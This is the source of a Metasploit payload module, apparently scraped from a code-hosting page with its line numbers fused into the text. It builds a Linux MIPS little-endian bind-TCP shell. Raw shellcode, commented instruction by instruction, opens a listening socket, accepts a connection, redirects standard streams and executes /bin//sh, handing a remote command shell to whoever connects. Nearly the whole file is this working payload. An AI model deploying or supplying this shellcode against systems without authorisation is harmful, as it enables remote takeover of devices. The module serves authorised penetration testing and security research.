Path: blob/master/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 23278include Msf::Payload::Single9include Msf::Sessions::CommandShellOptions1011def initialize(info = {})12super(13merge_info(14info,15'Name' => 'Linux Command Shell, Bind TCP Inline',16'Description' => 'Listen for a connection and spawn a command shell',17'Author' => [18'scut', # Original mips-irix-portshell shellcode19'vaicebine', # Original shellcode mod20'Vlatko Kosturjak', # Metasploit module21'juan vazquez' # Small fixes and optimizations22],23'License' => MSF_LICENSE,24'Platform' => 'linux',25'Arch' => ARCH_MIPSLE,26'Handler' => Msf::Handler::BindTcp,27'Session' => Msf::Sessions::CommandShellUnix,28'Payload' => {29'Offsets' => {},30'Payload' => ''31}32)33)34end3536def generate(_opts = {})37if !datastore['LPORT']38return super39end4041port = Integer(datastore['LPORT'])42port = [port].pack('n').unpack('cc')4344shellcode =45"\xe0\xff\xbd\x27" + # addiu sp,sp,-3246"\xfd\xff\x0e\x24" + # li t6,-347"\x27\x20\xc0\x01" + # nor a0,t6,zero48"\x27\x28\xc0\x01" + # nor a1,t6,zero49"\xff\xff\x06\x28" + # slti a2,zero,-150"\x57\x10\x02\x24" + # li v0,4183 ( __NR_socket )51"\x0c\x01\x01\x01" + # syscall52"\xff\xff\x50\x30" + # andi s0,v0,0xffff53"\xef\xff\x0e\x24" + # li t6,-17 ; t6: 0xffffffef54"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x10 (16)55port.pack('C2') + "\x0d\x24" + # li t5,0xFFFF (port) ; t5: 0x5c11 (0x115c == 4444 (default LPORT))56"\x04\x68\xcd\x01" + # sllv t5,t5,t6 ; t5: 0x5c11000057"\xfd\xff\x0e\x24" + # li t6,-3 ; t6: -358"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x259"\x25\x68\xae\x01" + # or t5,t5,t6 ; t5: 0x5c11000260"\xe0\xff\xad\xaf" + # sw t5,-32(sp)61"\xe4\xff\xa0\xaf" + # sw zero,-28(sp)62"\xe8\xff\xa0\xaf" + # sw zero,-24(sp)63"\xec\xff\xa0\xaf" + # sw zero,-20(sp)64"\x25\x20\x10\x02" + # or a0,s0,s065"\xef\xff\x0e\x24" + # li t6,-1766"\x27\x30\xc0\x01" + # nor a2,t6,zero67"\xe0\xff\xa5\x23" + # addi a1,sp,-3268"\x49\x10\x02\x24" + # li v0,4169 ( __NR_bind )A69"\x0c\x01\x01\x01" + # syscall70"\x25\x20\x10\x02" + # or a0,s0,s071"\x01\x01\x05\x24" + # li a1,25772"\x4e\x10\x02\x24" + # li v0,4174 ( __NR_listen )73"\x0c\x01\x01\x01" + # syscall74"\x25\x20\x10\x02" + # or a0,s0,s075"\xff\xff\x05\x28" + # slti a1,zero,-176"\xff\xff\x06\x28" + # slti a2,zero,-177"\x48\x10\x02\x24" + # li v0,4168 ( __NR_accept )78"\x0c\x01\x01\x01" + # syscall79"\xff\xff\xa2\xaf" + # sw v0,-1(sp) # socket80"\xfd\xff\x11\x24" + # li s1,-381"\x27\x88\x20\x02" + # nor s1,s1,zero82"\xff\xff\xa4\x8f" + # lw a0,-1(sp)83"\x21\x28\x20\x02" + # move a1,s1 # dup2_loop84"\xdf\x0f\x02\x24" + # li v0,4063 ( __NR_dup2 )85"\x0c\x01\x01\x01" + # syscall 0x4040486"\xff\xff\x10\x24" + # li s0,-187"\xff\xff\x31\x22" + # addi s1,s1,-188"\xfa\xff\x30\x16" + # bne s1,s0 <dup2_loop>89"\xff\xff\x06\x28" + # slti a2,zero,-190"\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"91"\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"92"\xec\xff\xaf\xaf" + # sw t7,-20(sp)93"\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"94"\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"95"\xf0\xff\xae\xaf" + # sw t6,-16(sp)96"\xf4\xff\xa0\xaf" + # sw zero,-12(sp)97"\xec\xff\xa4\x27" + # addiu a0,sp,-2098"\xf8\xff\xa4\xaf" + # sw a0,-8(sp)99"\xfc\xff\xa0\xaf" + # sw zero,-4(sp)100"\xf8\xff\xa5\x27" + # addiu a1,sp,-8101"\xab\x0f\x02\x24" + # li v0,4011 ( __NR_execve )102"\x0c\x01\x01\x01" # syscall 0x40404103104return super + shellcode105end106end107108109